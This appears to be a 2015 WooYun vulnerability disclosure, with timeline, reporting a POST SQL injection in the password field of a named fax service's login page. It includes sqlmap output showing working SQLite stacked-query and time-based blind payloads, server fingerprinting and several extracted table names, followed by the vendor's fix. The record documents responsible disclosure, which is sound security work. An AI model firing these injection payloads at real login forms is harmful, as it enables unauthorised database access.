乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-23: 细节已通知厂商并且等待厂商处理中 2015-06-25: 厂商已经确认,细节仅向厂商公开 2015-07-05: 细节向核心白帽子及相关领域专家公开 2015-07-15: 细节向普通白帽子公开 2015-07-25: 细节向实习白帽子公开 2015-08-09: 细节向公众公开
**
地址:http://fax.wasuitv.com/default.aspx"POST注入:
Place: POSTParameter: pwd Type: stacked queries Title: SQLite > 2.0 stacked queries (heavy query) Payload: __VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55So5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFB21lbXBhc3NyySPJunircnTGi856yoNga03SvQ==&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=/wEWBgL2vcS4CwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBizbl1mCN6fA Nn7F0WGZ6zbyD e&username=QBya&pwd='; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))--&mempass=on&btn_ok=%E7%A1%AE%E8%AE%A4 Type: AND/OR time-based blind Title: SQLite > 2.0 OR time-based blind (heavy query) Payload: __VIEWSTATE=/wEPDwUJODMxMjY2MzM2D2QWAgIBD2QWAgIPDw8WAh4EVGV4dAUb55So5oi35ZCN5oiW5a G56CB6ZSZ6K v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFB21lbXBhc3NyySPJunircnTGi856yoNga03SvQ==&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=/wEWBgL2vcS4CwKvpuq2CALGmdGVDALAsZ/nAQKBk7XADAKM54rGBizbl1mCN6fA Nn7F0WGZ6zbyD e&username=QBya&pwd=-7215' OR 5402=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'FjMW'='FjMW&mempass=on&btn_ok=%E7%A1%AE%E8%AE%A4---do you want to exploit this SQL injection? [Y/n] y[15:40:47] [INFO] the back-end DBMS is SQLiteweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: SQLite[15:40:47] [WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')[15:40:47] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'D:\Python27\sqlmap\output\results-06212015_0340pm.csv'[*] shutting down at 15:40:47
跑了下表名,太慢了
因为要出去,我就懒得跑了,列几个跑出来的表名:
[16:46:10] [INFO] resumed: ?qlite_sequence[16:46:10] [INFO] resumed: user_state[16:46:10] [INFO] resumed: folder[16:46:10] [INFO] resumed: user_email
RT
危害等级:低
漏洞Rank:2
确认时间:2015-06-25 10:37
传真厂家己进行版本升级,改为用VPN访问:)感谢
暂无